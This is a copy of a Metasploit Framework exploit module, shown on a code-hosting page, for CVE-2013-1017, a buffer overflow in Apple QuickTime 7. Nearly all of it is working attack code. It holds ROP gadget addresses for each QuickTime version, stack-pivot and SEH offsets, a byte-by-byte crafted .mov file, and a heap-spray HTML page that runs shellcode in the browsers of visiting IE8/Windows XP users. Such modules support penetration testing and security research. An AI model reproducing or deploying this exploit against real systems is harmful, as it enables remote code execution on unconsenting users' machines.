Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
19512 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",

17
        'Description' => %q{

18
          This module exploits a vulnerability found in Apple Quicktime. The flaw is

19
          triggered when Quicktime fails to properly handle the data length for certain

20
          atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer

21
          overflow by loading a specially crafted .mov file, and allows arbitrary

22
          code execution under the context of the current user.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor

27
          'Tom Gallagher', # Original Discovery (overlapped)

28
          'Paul Bates',    # Original Discovery (overlapped)

29
          'sinn3r'         # Metasploit

30
        ],

31
        'References' => [

32
          [ 'CVE', '2013-1017' ],

33
          [ 'OSVDB', '93625' ],

34
          [ 'BID', '60097' ],

35
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],

36
          [ 'ZDI', '13-110' ]

37
        ],

38
        'Platform' => 'win',

39
        'Targets' => [

40
          # All of the following addresses are from Quicktime.qts

41
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET

42
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', { 'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239 } ],

43
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', { 'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55 } ],

44
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259 } ],

45
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A } ]

46
        ],

47
        'Payload' => {

48
          'BadChars' => "\x00" # js_property_spray no like nilz

49
        },

50
        'DefaultOptions' => {

51
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

52
        },

53
        'Privileged' => false,

54
        'DisclosureDate' => '2013-05-22',

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62
  end

63


64
  def get_payload(t)

65
    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

66
    p = generate_rop_payload('msvcrt', alignment + payload.encoded, { 'target' => 'xp' })

67
    return p

68
  end

69


70
  def targetable?(agent)

71
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/

72
      return true

73
    elsif agent =~ /contype/

74
      # contype: a mov file request from Apple Quicktime

75
      return true

76
    end

77


78
    false

79
  end

80


81
  def get_html(t)

82
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))

83
    fake_mov_name = rand_text_alpha(4) + ".mov"

84
    html = %Q|

85
    <html>

86
    <head>

87
    <script>

88
    #{js_property_spray}

89


90
    var s = unescape("#{js_p}");

91
    sprayHeap({shellcode:s});

92
    </script>

93
    </head>

94
    <body>

95
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>

96
    </body>

97
    </html>

98
    |

99


100
    html.gsub(/^ {4}/, '')

101
  end

102


103
  def on_request_uri(cli, request)

104
    agent = request.headers['User-Agent']

105
    print_status("Requesting: #{request.uri}")

106


107
    unless targetable?(agent)

108
      print_error("Browser not supported, sending 404: #{agent}")

109
      send_not_found(cli)

110
      return

111
    end

112


113
    print_status("Target selected as: #{target.name}") if target

114


115
    if request.uri =~ /\.mov$/

116
      print_status("Sending specially crafted .mov file")

117
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })

118
    else

119
      html = get_html(target)

120
      send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })

121
    end

122
  end

123


124
  def sort_bytes(data)

125
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join

126
  end

127


128
  def rop_nop(t)

129
    [t['Nop']].pack('V*')                    # Ret (QuickTime.qts)

130
  end

131


132
  def exploit

133
    buf = ''

134
    buf << rand_text_alpha(467)              # 467 to align the pivot

135
    10.times {

136
      buf << rop_nop(target)

137
    }

138
    buf << [

139
      target['Pop'],                       # POP ESP; RET (QuickTime.qts)

140
      0x20302020                           # Target value for ESP (our ROP payload)

141
    ].pack('V*')

142
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler

143
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot

144
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size

145


146
    # Quicktime File Format Specifications:

147
    # https://developer.apple.com/standards/qtff-2001.pdf

148
    mov = "\x00\x00\x06\xDF" # File size

149
    mov << "moov"                            # Movie atom

150
    mov << "\x00\x00\x06\xD7"                # size (1751d)

151
    mov << "rmra"                            # Reference Movie atom

152
    mov << "\x00\x00\x06\xCF"                # size (1743d)

153
    mov << "rmda"                            # rmda atom

154
    mov << "\x00\x00\x06\xBF"                # size (1727d)

155
    mov << "rdrf"                            # Data reference atom

156
    mov << "\x00\x00\x00\x00"                # size set to 0

157
    mov << "alis"                            # Data reference type: FS alias record

158
    mov << "\x00\x00\x06\xAA"                # Size (1706d)

159
    mov << rand_text_alpha(8)

160
    mov << "\x00\x00\x06\x61"                # Size (1633d)

161
    mov << rand_text_alpha(38)

162
    mov << "\x12"

163
    mov << rand_text_alpha(81)

164
    mov << "\xFF\xFF"

165
    mov << rand_text_alpha(18)

166
    mov << "\x00\x08"                        # Size (8d)

167
    mov << rand_text_alpha(8)

168
    mov << "\x00\x00"

169
    mov << "\x00\x08"                        # Size (8d)

170
    mov << rand_text_alpha(8)

171
    mov << "\x00\x00"

172
    mov << "\x00\x26"                        # Size (38d)

173
    mov << rand_text_alpha(38)

174
    mov << "\x00\x0F\x00\x0E"

175
    mov << "AA"                              # Size (must be invalid)

176
    mov << rand_text_alpha(12)

177
    mov << "\x00\x12\x00\x21"

178
    mov << rand_text_alpha(36)

179
    mov << "\x00"

180
    mov << "\x0F\x33"

181
    mov << rand_text_alpha(17)

182
    mov << "\x02\xF4"                        # Size (756h)

183
    mov << rand_text_alpha(756)

184
    mov << "\xFF\xFF\x00\x00\x00"

185
    mov << buf

186


187
    @exploit = mov

188
    super

189
  end

190
end

191


192